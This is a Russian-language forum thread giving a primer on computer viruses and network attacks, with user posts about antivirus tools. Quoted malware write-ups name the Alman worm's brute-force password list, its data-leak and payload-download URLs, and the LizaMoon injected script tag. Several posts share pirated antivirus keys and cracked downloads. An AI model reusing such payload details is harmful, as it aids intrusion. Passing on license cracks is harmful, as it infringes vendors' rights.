<a href="http://service01.3bb.ru"><img src="http://ifolder.com.ua/pg0jlfn3smzr.html "width="120" height="118" border=0></a> <a href=" http://service01.3bb.ru"><img src="http://img108.mytextgraphics.com/flamewordmaker/2009/07/21/e3f3a951c1d7e3d129cfd82ffd819597.gif" border="0" alt="http://www.flamewordmaker.com - flame text"></a>

ДОБРО ПОЖАЛОВАТЬ НА МЕЖГОСУДАРСТВЕННЫЙ ФОРУМ СЛУЖБЫ 101. ВСЕГДА ВАМ РАДЫ !!! * *

--= СЛУЖБА 101 - наша служба !!! =--

Объявление


ПОЛИТИКИ НА ФОРУМЕ НЕТ !!!


Електронні петиції Президенту України

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » --= СЛУЖБА 101 - наша служба !!! =-- » Интернет (WWW), Hard & Soft » Защита компьютера от вирусов и внешних атак


Защита компьютера от вирусов и внешних атак

Сообщений 1 страница 30 из 36

1

Ликбез для начинающих, опытным тоже не мешает вспомнить!

Что же такое вирус?
Вирус - вредоносная программа для компьютера, заведомо приводящая к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы машины, или их сети.
Вообще вирусы это программы паразитирующие на других программах, т.е. внедряющиеся в заведомо «здоровую» программу. Но последнее время вирусами многие называют любую вредоносную программу.

Какие вирусы бывают ?
Trojan (Троянец или Троянский Конь)
О целях данного вируса можно догадаться из названия. Вариантов Троянов достаточно много. Как правило Трояны используют для несанкционированного доступа к чужому компьютеру. Например вам на почту приходит письмо с прикрепленным файлом. В письме написано «Посмотри дорогой друг какую замечательную игру я сделал!!!» Вы открываете файл, но ничего не происходит (для вас). На самом деле программа запускается и «открывает двери» злоумышленнику в вашу систему. Цели проникновения могут быть от простой шутки до промышленного шпионажа.

Worm (Червь)
Червь это программа, которая распространяются по глобальным сетям, поражая целые системы, а
не отдельные программы. Это самый опасный вид вирусов, так как объектами нападения в этом случае становятся информационные системы государственного масштаба. Как правило заражение происходит с помощью уязвимостей (недоработок/ошибок) Операционных Систем или отдельных программ.
Черви являются одними из самых распространенных и следовательно опасных вирусов. Их главная опасность состоит в том что как правило они распространяются массово используя уязвимости системы. Если учесть что основной операционной системой земли является MS Windows , то появление «дыр» в ней приводит к целым эпидемиям.
Яркими представителям сего вида считается Blaster (Lovesan) который в Августе 2003 года распространился по всему миру, также засоряя сеть большим количеством мусорного трафика. Червь содержит оскорбления в адрес Билла Гейтса и запрограммированную DoS-атаку (DoS-атака одно из зловредный действий вируса. Её смысл состоит в том что с определенного количества компьютеров отправляется бесполезная информация на один или несколько компьютеров сети. При большом количестве запросов компьютер-жертва просто не может больше функционировать в сети нормально) на сервер обновления ОС Windows.

Классические компьютерные вирусы
В отличие от червей, вирусы не используют сетевых сервисов для проникновения на другие компьютеры. Копия вируса попадает на удалённые компьютеры только в том случае, если зараженный объект по каким-либо не зависящим от функционала вируса причинам оказывается активизированным на другом компьютере.

Макровирус
Макровирус - это разновидность компьютерных вирусов разработанных на макроязыках, встроенных в такие прикладные пакеты ПО, как Microsoft Office. Для своего размножения такие вирусы используют возможности макроязыков и при их помощи переносятся из одного зараженного файла в другие. Большая часть таких вирусов написана для MS Word.

Хакерские утилиты и прочие вредоносные программы
К данной категории относятся:
• утилиты автоматизации создания вирусов, червей и троянских программ (конструкторы);
• программные библиотеки, разработанные для создания вредоносного ПО;
• хакерские утилиты скрытия кода зараженных файлов от антивирусной проверки (шифровальщики файлов);
• «злые шутки», затрудняющие работу с компьютером;
• программы, сообщающие пользователю заведомо ложную информацию о своих действиях в системе;
• прочие программы, тем или иным способом намеренно наносящие прямой или косвенный ущерб данному или удалённым компьютерам

Как вирус попадает на мой компьютер ?
Вариантов множество:
• Вы скачиваете файл с Интернета. На сайте, с которого вы его взяли написано что это нужная вами программа, а в результате там может содержатся вирус (или ваша программа, зараженная вирусом)
• Вы получаете e@mail или сообщение через ICQ с прикрепленным файлом. Дело в том что многие вирусы заразив компьютер начинают рассылаться по вашим контактам. Причем вы можете даже и не знать об этом.
• Со съемного носителя. Например вы вставляете Флеш диск в компьютер. На диске содержался вирус и он автоматически активировался. Никогда не замечали что если вставить CD с игрой в компьютер, игра сама предложит установится. Тут происходит точно также, только ставится будет вирус и спрашивать не будет.
• Через сеть. Если у вас установлена уязвимая программа , вирус с зараженного компьютера в Интернет может проникнуть на ваш компьютер.

Что делать если компьютер заражен вирусом?

Верными признаками заражения компьютера являются:
• Вывод на экран нежелательных сообщений, изображении итд.
• Вывод нежелательных сигналов компьютером
• Запуск каких либо программ без вашего участия
• При наличии Firewall’a появление запросов от неизвестных программ на доступ в Интернет
• Рассылка от вас электронной почты без вашего ведома (так же с вашего ICQ могут рассылаться сообщения и копии вируса)
• Частые зависания и сбои в работе (хотя это может случатся и не только по причине вируса)
• Медленная работа программ или компьютера в целом (например если вирус «замусорил» оперативную память)
• Исчезновение файлов или каталогов или искажение их содержимого (например появление исполняемых файлов с названием папки в которой они содержатся)
• Интернет браузер ведет себя «неадекватно» (например при заходе на любой сайт вы попадаете постоянно на другой)
• Невозможность загрузки компьютера

Если вы уверены что вирус на вашем компьютере есть то сделайте следущее:
• Отключите компьютер от Интернет и локальных сетей
• Отключите все съемные носители информации (флеш диски итп.) (помните что они скорее всего уже тоже заражены , не следует их подключать к другим компьютерам, так как те тоже могут быть заражены)
• Установите Антивирус (я рекомендую Антивирус Касперского или NOD 32) (и обновите его вирусные базы)
• Полностью просканируйте компьютер Антивирусом.

Как защитить себя от заражения вирусом?
• Поставьте себе антивирус. Не обязательно все время держать его включенным. Можно периодически сканировать компьютер. Хотя я не рекомендую так делать , так как многие Антивирусы сканируют все исполняемые файлы перед запуском. Поэтому если вы вдруг случайно запустите вирус то Антивирус может заблокировать его выполнение.
• Всегда будьте внимательны к файлам, которые запускаете. Документ с названием privet.doc.exe является исполняемым файлом, не смотря на то что иконка программы может выглядеть как документ ворда. Если у вас стоит скрытие расширений известных типов файлов, то такой документ будет называться privet.doc – стоит насторожится если другие документы Word у вас выглядят просто как название(т.е. «privet»)
• Все скачанные файлы с Интернета стоит сканировать Антивирусом
• Так же сканируйте флеш карты и USB-диски при установке в компьютер (так же помните что если ваш антивирус выключен , и вы подключили диск к компьютеру, вирус может сам запустится без вашего спроса)
• Стоит с подозрением относится к файлам, переданным вам по ICQ или почте
• Если документ MS Office спрашивает о загрузке макросов из файла, то стоит задуматься о благонадежности данного файла. Если вы скачали его с Интернет или локальной сети, то не стоит запускать работу макросов. Возможно документ содержит вирус.
• Устанавливайте «заплатки» к вашей Операционной Системе и установленным программам. Многие Операционные Cистемы поддерживают автоматическое обновление (например Windows XP или Linux Ubuntu). Это защитит вас от вирусов, распространяющихся посредством ошибок в программах или Операционных Системах.

Сетевые Атаки

Сетевые Атаки явление встречающиеся реже чем вирусы , но более опасное. Целью сетевой атаки может быть неправомерное завладение информацией, либо блокировки работы отдельного компьютера или целой подсети . Сетевые Атаки как правило совершаются Хорошо подготовленными Хакерами , хотя случаются случаи когда этим занимаются «детишки» для собственного развлечения . Существует огромное количество Сетевых Атак и их классификаций , я опишу лишь самые известные.

Brute force (грубая сила)
Это метод преодоления защиты паролем. Смысл состоит в том что пароль подбирается перебором всех возможных вариаций . Может быть применен как по сети , так и на локальной машины . Иногда брут форс применяют с использованием словарей . Именно поэтому необходимо использовать устойчивые к подбору пароли . И конечно же пароль НЕ ДОЛЖЕН быть осмысленным словом . Крайне желательно использование цифр совмесно с буквами , а так же букв верхнего и нижнего регистров.
Пример : при взломе со скоростью 10000 комбинаций в секунду (при использовании латиницы в одном регистре + цифр) скорость подбора пароля из 4 символов ~20 секунд; из 8 символов около 10 месяцев. Естественно если взлом будет идти не по словарю.

Сетевая разведка
Сетевая разведка как правило предшествует самой атаке и служит для выявления видов операционных систем , сервисов итп компьютера жертвы. В дальнейшем эта информация может быть использована для взлома.
Самая распространенная разведка – Сканирование портов . Смысл состоит в том, что у каждой программы работающей в сети на вашем компьютере есть свой сетевой порт , на который программа получает информацию из сети . Просканировав порты можно узнать тип операционной системы , установленные приложения, а так же их версию (что тоже немаловажно).

Exploit
Эксплойт (англ. exploit — использовать) – программа , предназначенная для взлома системы. Принцип её действия заключается в том , что она используя уязвимость какой-либо программы на компьютере-жертве может выполнить на нем несанкционированные действия. Существуют «локальные» и «удаленные» эксплоиты. Локальные направлены на повышение привилегий атакующего (например получение привилегий администратора) (так же их называют rootkit); удаленный эксплоит функционирует через сеть и использует уязвимость в защите без какого-либо предварительного доступа к уязвимой системе.
Именно для использования эксплоитов нужна сетевая разведка , которая позволяет выявить уязвимое программное обеспечение.
Как правило именно эксплоитами пользуются неквалифицированные «Хакеры-детишки» , беря уже готовую программу для взлома.
Защитой от эксплоитов служит постоянное обновление своего программного обеспечения , для закрывания «дыр» в системе.
Иногда Эксплоитами пользуются для распространения вирусов (о чем я уже писал выше). Вирус используя уязвимость системы заражает компьютер жертвы. Именно с такими вирусами связаны целые «эпидемии» вирусов.

DoS и DDoS – атаки
DoS (от англ. Denial of Service — Отказ в обслуживании) – смысл атаки состоит в выведении из строя компьютера жертвы. Принцип действия заключается в «закидывании» жертвы ненужной информацией. При достаточно большой интенсивности можно вывести компьютер жертвы из сети. Так же возможет комбинированный метод когда посылается поток информации с вредоносным кодом на уязвимое приложение.
DoS атака зачастую мало эффективна и имеет смысл только когда скорость передачи взломщика в разы превышает возможность приёма жертвы. DDoS – атака это разновидность DoS - атаки . DDoS атака отличается лишь тем , что в ней используется не 1 компьютер-взломщик а гораздо больше. Зачастую для этого используются специальные вирусы , которые после заражения ждут приказа начать атаку . ~2000 компьютеров способны вывести из строя небольшой Интернет сервер.
Защитится от DDoS – атаки почти невозможно.

Троянский конь
Троянская программа в какой-то степени тоже является видом сетевой атаки. Каким-либо образом вас заставляют запустить на своем компьютере её , после чего получают доступ к удаленной системе.
Иногда после успешного взлома системы Хакеры оставляют троянскую программу , на тот случай если им нужно будет снова получить доступ к этой системе.

Шутки Троянов:

К таковым относятся (наиболее прикольные):
1. Самопроизвольно выдвигается CD-ROM - выдвижением управляет хозяин трояна, а вы сервер
(причина: Троян "Смерть Ламерам" и др. виды).
2. Вдруг на экране появилась картинка "кукиша", тогда как вы
в то время пишите очередное стихотворение... (троян - Смерть Ламерам и др. виды).
3. Неожидано в колонках раздался звук ревущей коровы (Асоциация хакеров США,
иначе говоря троян Бэкорифес - Культ мертвой коровы).
4. Не можете что-либо запустить с таксбара и вообще он перестал был доступным
(вкл. кнопку Пуск) - троян.
5. Исчезновение с таксбара (серой полоски внизу экрана - панель задач) справа
иконок защиты (причина: вам вырезали програму, в частности антивирь,
который вы давно не обновляли).
6. При проверки компьютера на вирусы, ваш антивирус выдает ошибку (табличку)
с сообщение, что у вас какая то ошибка, а в конце сообщает, что все в порядке
(причина: Вам вырезали библиотеку по троянам в антивирусе, результат - антивирус
работает, но троянов не видит в упор).
7. Вам по почте прислали то, что вы писали в одиночестве (способы разные),
самый изощренный - у вас сграбили экран (скриншот) и посмотрели, что вы писали и кому писали,
и вообще, как выглядить ваш рабочий стол...

Да и последнее, никогда не доверяйте иконкам от скаченной программы. Если скаченная
программа с белой иконкой - первый признак, что она "левая".
Также не доверяйте иконкам от имеющихся у вас программ. Есть такие программы,
например, как Микеланджело, которые позволяют присвоить любой программе
(трояну в частности) любую иконку. И особенно присматривайтесь к расширением
после названия и что перед ними стоит, ибо точка, которую вы видите, может
оказаться обычной запятой, а это значит, что название файла имеет продолжение
и его реальное расширение далеко позади.

Пример:
На экране будет выглядить так:
Маша раздевается,JPG
А на самом деле, это выглядить вот так (точки - это пробелы, на экране вы их не увидите):
Маша раздевается,JPG .... ..... ..... ......EXE
Самое смешное, что вы увидите "голую бабу", но одновременно с ней вы откроете
у себя и скрытый порт (а их 65 тыс. с гаком). Если сканирующий вас чел, определит, что у вас
открыт порт от трояна, то в вашем компе может поселится не только тот, кто вас взломал,
но может поселится еще и тот - кто вас нашел... а таких может быть с десяток.


На сегодняшний день это может быть исчерпывающей информацией, но количество и качество вирусов растет с огромной скоростью и может быть на момент прочтения Ваш компьютер уже будет заражен... к сожалению  o.O
Оставайтесь всегда на чеку!!!

0

2

prolua написал(а):

может быть на момент прочтения Ваш компьютер уже будет заражен... к сожалению

:O
Мда, полезная информация, вот только не совсем радостная! :huh:

0

3

Сегодня боролся целый день с вирусом Win32.Alman и Alman1 на семи компьтерах одновременно. Вирус распространился по сети со скоростью звука. На трех машинах антивирусника не было совсем, на двух Касперский и Аваст без обновления. Поборол его утилитой DrWeb Curelt, на всех машинах поставил DrWeb 4.44. Но чуствую, что бдительность нельзя терять.

0

4

Shylc написал(а):

На трех машинах антивирусника не было совсем

Windows без антивирусника - мертва в очень скором времени, особенно при наличии сети.  :canthearyou:
Для лучшей борьбы с вирусом надо знать его устройство:

Virus.Win32.Alman.a

Вирус, заражающий исполняемые файлы Windows. Является приложением Windows (PE EXE-файл).

Инсталляция

При запуске вирус извлекает из своего тела следующие файлы:

    * %WinDir%\AppPatch\deamon.dll — имеет размер 3072 байта;
    * %WinDir%\c_126.nls — имеет размер 31744 байта.

Вредоносная программа создает ключ реестра, куда записывает ссылку на свой исполняемый файл:

[HKCR\CLSID\{C111980D-B372-44b4-8095-1B6060E8C647}]

Деструктивная активность

Вирус заражает все доступные для записи исполняемые файлы Windows (PE-EXE) на всех дисках зараженного компьютера и во всех доступных сетевых папках. Не заражаются файлы со следующими именами:

wooolcfg.exe
woool.exe
ztconfig.exe
patchupdate.exe
trojankiller.exe
xy2player.exe
flyff.exe
xy2.exe
au_unins_web.exe
cabal.exe
cabalmain9x.exe
cabalmain.exe
meteor.exe
patcher.exe
mjonline.exe
config.exe
zuonline.exe
userpic.exe
main.exe
dk2.exe
autoupdate.exe
dbfsupdate.exe
asktao.exe
sealspeed.exe
xlqy2.exe
game.exe
wb-service.exe
nbt-dragonraja2006.exe
dragonraja.exe
mhclient-connect.exe
hs.exe
mts.exe
gc.exe
zfs.exe
neuz.exe
maplestory.exe
nsstarter.exe
nmcosrv.exe
ca.exe
nmservice.exe
kartrider.exe
audition.exe
zhengtu.exe

При инфицировании файлов вирус записывает свой исполняемый файл впереди их оригинального содержимого. Для заражения файлов, находящихся в сетевых папках, вирус пытается подключиться к удаленным компьютерам с учетной записью «Administrator», используя один из следующих паролей:

zxcv
qazwsx
qaz
qwer
!@#$%^&*()
!@#$%^&*(
!@#$%^&*
!@#$%^&
!@#$%^
!@#$%
aasdf
sdfgh
!@#$
654321
123456
12345
1234
123
111

Вирус сообщает на сайт злоумышленника информацию о количестве свободного места на диске С:, версию операционной системы и браузера Internet Explorer, а также о наличии в системе драйверов с одним из следующих имен:

Hooksys
KWatch3
KregEx
KLPF
NaiAvFilter1
NAVAP
AVGNTMGR
AvgTdi
nod32drv
PavProtect
TMFilter
BDFsDrv
VETFDDNT

Эти сведения отсылаются в параметрах запроса к сайту злоумышленника:

http://****mrw0rldwide.com/co.asp?action=post&HD=<кол-во свободного места>&OT=
<версия ос>&IV=<версия IE>&AV=<установленные драйвера>

Также вирус получает по следующей ссылке список файлов, предназначенных для загрузки из сети Интернет:

http://****mrw0rldwide.com/z.dat

Затем скачивает файлы из данного списка во временную папку Windows и запускает их на исполнение.

На момент создания описания вирус загружал файлы по ссылкам:

http://down****net/css.jpg
http://down****net/wow.jpg

И сохранял их соответствующим образом:

    * %Temp%\css.jpg — имеет размер 62792 байта, детектируется Антивирусом Касперского
       как Trojan-PSW.Win32.OnLineGames.afd;
    * %Temp%\wow.jpg — имеет размер 40241 байт, детектируется Антивирусом Касперского
       как Trojan-PSW.Win32.WOW.sv.

Общий метод лечения системы от файловых вирусов:
Создаем на чистой системе загрузочный CD (или флешку), записываем туда же распакованный Dr.Web CureIt, загружаемся с CD и запускаем сканирование дисков зараженной системы, или подключаем винт к чистой системе , на которой есть антивирус и лечим зараженный диск, такой метод обеспечивает лечение системных файлов зараженной системы и защиту от заражения самого антивируса. После лечения вероятно может потребоваться восстановление системных файлов, пуск-выполнить - sfc /scannow. Проверить стали ли файлы чистые просто - после перезагрузки проверяем какой-либо часто используемый системой файл, например explorer.exe, на virustotal.com (такую проверку можно провести и до sfc /scannow), если на virustotal.com файл определяется как зараженный, и ваш антивирус не может лечить этот файл, можно отправить этот файл в антивирусную лабораторию, через некоторое время ваш антивирус сможет лечить вирус.

0

5

Новый SMS-вирус ворует деньги с телефонных счетов

Отредактировано Віталій (26-01-2009 17:15:09)

0

6

Ссылка выше рабочая - убрать косую в конце адреса
Трояну всего одна неделя, а он уже имеет пять вариаций....

0

7

prolua написал(а):

убрать косую в конце адреса

вибачаюся, незамітив...

0

8

Рекомендую AVIRA маленький, шустрый, отлавливает многое попробуйте. Минус - он на английском(free), но очень прост в понимании(для обновления желательно интернет, или поставить более свежую версию)

Avira AntiVir Personal - FREE Antivirus
Лучше и легче предохранится, чем потом разгребать последствия!

Отредактировано prolua (02-02-2009 19:45:14)

0

9

Outpost Firewall Pro + пожизненный ключ


http://img11.nnm.ru/4/d/5/c/c/7f94ae013b839edb71cf1fcaceb.jpg




Новая версия Outpost Firewall Pro - это супер-арсенал защиты против хакерских проникновений и аттак, утечки информации и "слежки", троянов и так далее. Сильные стороны: безопасность, контроль, сохранность секретной информации и простота в использовании.
Outpost Firewall Pro - персональный брандмауэр, обеспечивающий всестороннюю защиту в сети Интернет. По праву считаясь одной из лучших программ для защиты персональных компьютеров, Outpost Pro объединяет все последние достижения в области технологии защиты и является лучшим решением для обеспечения безопасности Вашей системы.

Язык интерфейса: Русский

Скачать

.

Отредактировано alex519 (01-06-2010 15:43:48)

0

10

alex519 написал(а):

По праву считаясь одной из лучших программ для защиты персональных компьютеров, Outpost Pro объединяет все последние достижения в области технологии защиты и является лучшим решением для обеспечения безопасности Вашей системы.

Згідний. У мене на роботі стоїть на моєму ноуту теж... програма  :cool:

0

11

Новый вирус влез в девять миллионов компьютеров

0

12

Новый вирус "поздравит" ваш компьютер с днем Святого Валентина

0

13

Dzanta написал(а):

Спасибо. Скачиваю. А совместно с NOD можно установить? А то зачисткой в лом заниматься, вчерашнего дня хватило с лихвой.

Если ты имеешь ввиду Outpost Firewall Pro, то можно... У меня тоже он стоит совместно с НОД32...

0

14

Dzanta написал(а):

"пожизненный ключ". Это по нашему!

:cool:

0

15

Народ может поможете...Купила тут месяца 4 назад ноут, ну и как подарок там стояла VISTA  :x  нашла NOD32 Start Smart  а он обновляться перестал.... и вот уже месяца 2 сижу без обновлений...уже боязно.....Уже б давно снесла но с вистой мало что дружит, то есть она ни с чем не дружит...кто чем сможет помочь?

0

16

ФайрА написал(а):

кто чем сможет помочь?

Скачать “ESET Smart Security v3.0.684 Business Edition (x32x64) Rus”

0

17

Віталій
Спасибо огромное :flirt:

Отредактировано ФайрА (06-02-2009 14:20:33)

0

18

ФайрА написал(а):

Спасибо огромное

Всегда пожалуйста!  :blush:

0

19

ФайрА написал(а):

NOD32 Start Smart  а он обновляться перестал.... и вот уже месяца 2 сижу без обновлений...уже боязно.....

Ключики для обновления НОД32 лежат ЗДЕСЬ

+1

20

у меня такое же было, сегодня полдня мучалась, нашла сайт обновлений, которые не требуюи имени пользователя/пароля вот тут их можно найти....у  меня заработало, правда для того что бы что то увидеть, придется пройти регистрацию, занимает меньше минуты....

0

21

А если при загрузке компа вылазит диалог: Проблема загрузки файла RUNDLL, типа как-то так писал. Что значит? Необходимо лечиться? У меня НОД 32-й стоит с полной защитой, ничего не определил??? Как быть помогите кто знает??? :question:

0

22

А если прописывает при загрузке диалог: Проблема с загрузкой файла RUNDLL, как-то так. У меня НОД-32 полной версии, в настройках полная защита и ничего не определяет. Помогите, если кто-то что-то знает??? :dontknow:  :question:

0

23

У меня частенько Firewall блокирует такое SHORT_FRAGMENTS,что это такое и  какая от этого угроза?

0

24

Если у кого-то есть ключи к Доктору Веберу помогите пожалуйста... :crazy:  Не сочтите за наглость, я просто прошу... :blush:

0

25

Зараз є ключ до 20.10.09 пізніше дістану необмежеий.
drweb32.key на FileShare.in.ua

Отредактировано Fenix (04-09-2009 16:15:59)

0

26

~GAD~
нод штука отличная... для обновления нужно провести дополнительные настройки:
открываеш расширенные настройки - инструменты  - threatsense.net - отключаете он-лайн систему обнаружения... и усе...
в гугле найдеш парочку ключей и вперед к обновлению...

0

27

Ще ключі до веба
ключ_ до др.веба.rar на FileShare.in.ua

0

28

NOD32 4.0

Компания ESET выпустила 4-е поколение своего антивирусного решения. Новая версия дополнена более чем 20-ю нововведениями, которые направлены на улучшение поиска вредоносных программ, диагностику и лечение зараженной системы.

http://www.esetnod32.ru/download/img/eav_box.png

Среди наиболее важных нововведений NOD32 4.0 разработчики отмечают следующие:

- Улучшен интерфейс. Стал более удобен и понятен;
- Улучшен модуль самозащиты от вредоносных программ, воздействующих на антивирус;
- Расширенное сканирование архивов с возможностью настройки ряда параметров сканирования;
- Возможность блокировать доступ к съемным носителям (CD и USB);
- Отслеживание обновлений безопасности Windows c уведомлением пользователя о наличии критических обновлений;
- ESET SysInspector — проверяет систему на наличие руткитов без необходимости запуска полного сканирования. Модуль контролирует изменения в операционной системе, регистрационных данных приложений, настройках браузеров;
- ESET SysRescue — утилита для восстановления системы в случае повреждения. Возможно создать собственный диск аварийного восстановления системы, загрузиться с него, просканировать систему и удалить вредоносные программы;
- Идентификация компьютера позволяет определить типа компьютера (настольный или мобильный) и автоматически отрегулировать нагрузку;
•  Совместимость и встраиваемость в сложные многоуровневые структуры систем безопасности и с программами большинства производителей. Поддержка Cisco NAC, расширенные отчеты, контроль внешних носителей и улучшенная политика авторизации.

NOD32 — это очень достойное антивирусное решение, занимающее одну из лидирующих позиций на рынке. Программа способна уберечь от разного рода вредоносных программ, несанкционированного доступа, мошенников, рекламы и прочего. Версия NOD32 Антивирус защищает от вирусов, троянских программ, червей, рекламы, шпионских программ, фишинг-атак и руткитов, а версия Smart Security вдобавок к этому включает еще и фаервол и защиту от спама.


Скачать. eav_nt32_rus.msi

Скачать. eav_nt64_rus.msi



.

Отредактировано alex519 (01-06-2010 16:26:12)

0

29

Новая угроза.

Хакеры внедряют код на языке SQL в ссылки страниц и перенаправляют пользователей на фальшивый сайт.

Более 1,5 млн сайтов по всему миру заразились в результате атаки вирусом, который встраивает в URL ссылки на вредоносный файл. Такова предварительная оценка масштабов атаки типа "SQL-внедрение", которую провели специалисты Websense Security. Эта американская лаборатория впервые заметила вредоносные файлы 29 марта.

Внедряемый файл меняет текстовые поля в базе данных и внедряет в них дополнительный фрагмент <script src=hxxp://lizamoon.com/ur.php></script>, который загружает с удаленного сервера вредоносную программу. Затем пользователей направляли сайт с фальшивыми антивирусными утилитами под названием Windows Stability Center. С него предлагалось за деньги загрузить антивирусное ПО. Microsoft отношения к этому сайту не имеет. Websense Security перечисляет несколько адресов с вредоносным файлом, на которые направляют пользователей.

Атака названа по имени вредоносного кода, который загружается в ссылки, — LizaMoon.

Специалисты Websense разглядели вредоносный код, в частности, на некоторых страниц музыкального магазина iTunes от компании Apple.
Новость тут

0

30

эээ...наверное сюда,в эту тему.от лаборатории касперского сейчас акция -три месяца бесплатного использования.заходите на страницу касперского в фэйсбуке.   вот ссылка  http://www.facebook.com/KasperskyLabRus … 1435508225 заходите на страницу,нажимаете (мне нравится)вам доступен промокод ,переход на сайт,указать промокод и имейл,на имейл приходит код доступа,а с сайта скачиваете kis exe ,все.у меня уже стоит-kaspersky internet sekyrity версия 11.0.2.556 b.c.e.f

0


Вы здесь » --= СЛУЖБА 101 - наша служба !!! =-- » Интернет (WWW), Hard & Soft » Защита компьютера от вирусов и внешних атак